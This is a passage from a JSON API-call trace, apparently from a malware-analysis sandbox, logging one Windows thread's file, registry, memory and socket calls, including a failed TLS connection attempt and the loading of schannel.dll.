                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 1388
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb82",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000004b8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x000f0005",
                "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x000004b4"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui"
              }
            ],
            "repeated": 0,
            "id": 1389
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbcc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000004b8"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05450000"
              },
              {
                "name": "SectionOffset",
                "value": "0x06d5da60"
              },
              {
                "name": "ViewSize",
                "value": "0x00001000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1390
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbdc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004b8"
              }
            ],
            "repeated": 0,
            "id": 1391
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34da871",
            "parentcaller": "0x7ffee10bad69",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05450000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 1392
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34da87f",
            "parentcaller": "0x7ffee10bad69",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004b4"
              }
            ],
            "repeated": 0,
            "id": 1393
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee10bad9e",
            "parentcaller": "0x7ffee22d0f45",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x02f10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0000a000"
              }
            ],
            "repeated": 0,
            "id": 1394
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee22d0ed8",
            "parentcaller": "0x7ffee22d0d4d",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x02f10002",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\System32\\wshqos.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000022"
              }
            ],
            "repeated": 0,
            "id": 1395
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34a84c4",
            "parentcaller": "0x7ffee34bd136",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              }
            ],
            "repeated": 0,
            "id": 1396
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb2a",
            "parentcaller": "0x7ffee34bb99e",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000004b4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 1397
          },
          {
            "timestamp": "2025-11-20 10:58:35,172",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb82",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000004b8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x000f0005",
                "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x000004b4"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui"
              }
            ],
            "repeated": 0,
            "id": 1398
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbcc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000004b8"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05450000"
              },
              {
                "name": "SectionOffset",
                "value": "0x06d5da60"
              },
              {
                "name": "ViewSize",
                "value": "0x00001000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1399
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbdc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004b8"
              }
            ],
            "repeated": 0,
            "id": 1400
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34da871",
            "parentcaller": "0x7ffee10bad69",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05450000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 1401
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34da87f",
            "parentcaller": "0x7ffee10bad69",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004b4"
              }
            ],
            "repeated": 0,
            "id": 1402
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee10bad9e",
            "parentcaller": "0x7ffee22d0f45",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x02f10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0000a000"
              }
            ],
            "repeated": 0,
            "id": 1403
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee22d0ed8",
            "parentcaller": "0x7ffee22d0d4d",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x02f10002",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\System32\\wshqos.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000022"
              }
            ],
            "repeated": 0,
            "id": 1404
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34a84c4",
            "parentcaller": "0x7ffee34bd136",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              }
            ],
            "repeated": 0,
            "id": 1405
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb2a",
            "parentcaller": "0x7ffee34bb99e",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000004b4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 1406
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb82",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000004b8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x000f0005",
                "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x000004b4"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui"
              }
            ],
            "repeated": 0,
            "id": 1407
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbcc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000004b8"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05450000"
              },
              {
                "name": "SectionOffset",
                "value": "0x06d5da60"
              },
              {
                "name": "ViewSize",
                "value": "0x00001000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1408
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbdc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004b8"
              }
            ],
            "repeated": 0,
            "id": 1409
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34da871",
            "parentcaller": "0x7ffee10bad69",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05450000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 1410
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34da87f",
            "parentcaller": "0x7ffee10bad69",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004b4"
              }
            ],
            "repeated": 0,
            "id": 1411
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee10bad9e",
            "parentcaller": "0x7ffee22d0f45",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x02f10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0000a000"
              }
            ],
            "repeated": 0,
            "id": 1412
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee22d0ed8",
            "parentcaller": "0x7ffee22d0d4d",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x02f10002",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\System32\\wshqos.dll"
              },
              {
                "name": "dwFlags",
                "value": "0x00000022"
              }
            ],
            "repeated": 0,
            "id": 1413
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34a84c4",
            "parentcaller": "0x7ffee34bd136",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU"
              }
            ],
            "repeated": 0,
            "id": 1414
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb2a",
            "parentcaller": "0x7ffee34bb99e",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000004b4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 1415
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34bbb82",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000004b8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x000f0005",
                "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x000004b4"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\wshqos.dll.mui"
              }
            ],
            "repeated": 0,
            "id": 1416
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbcc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000004b8"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05450000"
              },
              {
                "name": "SectionOffset",
                "value": "0x06d5da60"
              },
              {
                "name": "ViewSize",
                "value": "0x00001000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1417
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34bbbdc",
            "parentcaller": "0x7ffee34bb99e",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004b8"
              }
            ],
            "repeated": 0,
            "id": 1418
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34da871",
            "parentcaller": "0x7ffee10bad69",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05450000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 1419
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34da87f",
            "parentcaller": "0x7ffee10bad69",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004b4"
              }
            ],
            "repeated": 0,
            "id": 1420
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee10bad9e",
            "parentcaller": "0x7ffee22d0f45",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x02f10000"
              },
              {
                "name": "RegionSize",
                "value": "0x0000a000"
              }
            ],
            "repeated": 0,
            "id": 1421
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee167e28a",
            "parentcaller": "0x7ffec77b0c99",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000004a8"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\Afd"
              },
              {
                "name": "FileInformationClass",
                "value": "41",
                "pretty_value": "FileIoStatusBlockRangeInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1422
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee34e5ebd",
            "parentcaller": "0x7ffee34e5dd8",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000004a8"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\Afd"
              },
              {
                "name": "FileInformationClass",
                "value": "30",
                "pretty_value": "FileCompletionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\xa5\\x91\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1423
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffec77afc47",
            "parentcaller": "0x7ffec77af179",
            "category": "network",
            "api": "ConnectEx",
            "status": false,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              },
              {
                "name": "SendBuffer",
                "value": ""
              },
              {
                "name": "ip",
                "value": "172.66.171.73"
              },
              {
                "name": "port",
                "value": "443"
              }
            ],
            "repeated": 0,
            "id": 1424
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee22d2f0d",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000460"
              }
            ],
            "repeated": 0,
            "id": 1425
          },
          {
            "timestamp": "2025-11-20 10:58:35,187",
            "thread_id": "1596",
            "caller": "0x7ffee347c23a",
            "parentcaller": "0x7ffee34c37ea",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000458"
              }
            ],
            "repeated": 0,
            "id": 1426
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffec77b1244",
            "parentcaller": "0x7ffec77ae8eb",
            "category": "network",
            "api": "setsockopt",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              },
              {
                "name": "level",
                "value": "0x7ffe0000ffff"
              },
              {
                "name": "optname",
                "value": "0x00007010"
              },
              {
                "name": "optval",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1427
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffee0264869",
            "parentcaller": "0x7ffee22d0970",
            "category": "device",
            "api": "NtDeviceIoControlFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000004a8"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\Afd"
              },
              {
                "name": "IoControlCode",
                "value": "0x0001202f",
                "pretty_value": "IOCTL_AFD_GET_SOCK_NAME"
              },
              {
                "name": "InputBuffer",
                "value": ""
              },
              {
                "name": "OutputBuffer",
                "value": "\\x02\\x00\\xc2!\\xc0\\xa8\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1428
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee0a43311",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\schannel"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedfaa0000"
              }
            ],
            "repeated": 0,
            "id": 1429
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee0a43311",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\schannel.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedfaa0000"
              }
            ],
            "repeated": 0,
            "id": 1430
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee0a43311",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffedfaa0000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "C:\\Windows\\system32\\schannel.DLL"
              },
              {
                "name": "dwFlags",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 1431
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffee10cac31",
            "parentcaller": "0x7ffee0a4345b",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "schannel.DLL"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffedfaa0000"
              },
              {
                "name": "FunctionName",
                "value": "SpUserModeInitialize"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffedfab3ec0"
              }
            ],
            "repeated": 0,
            "id": 1432
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffedfab3f81",
            "parentcaller": "0x7ffedfab3efe",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "Handle",
                "value": "0x000004cc"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\Schannel"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1433
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffedfab3fd0",
            "parentcaller": "0x7ffedfab3efe",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004cc"
              },
              {
                "name": "ValueName",
                "value": "UserContextLockCount"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextLockCount"
              }
            ],
            "repeated": 0,
            "id": 1434
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffedfab4043",
            "parentcaller": "0x7ffedfab3efe",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004cc"
              },
              {
                "name": "ValueName",
                "value": "UserContextListCount"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextListCount"
              }
            ],
            "repeated": 0,
            "id": 1435
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffedfab4080",
            "parentcaller": "0x7ffedfab3efe",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000004cc"
              }
            ],
            "repeated": 0,
            "id": 1436
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d57000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1437
          },
          {
            "timestamp": "2025-11-20 10:58:35,219",
            "thread_id": "1596",
            "caller": "0x7ffee0a45563",
            "parentcaller": "0x7ffee0a451d8",
            "category": "threading",
            "api": "NtQueryInformationThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "ThreadInformationClass",
                "value": "0",
                "pretty_value": "ThreadBasicInformation"
              },
              {
                "name": "ThreadInformation",
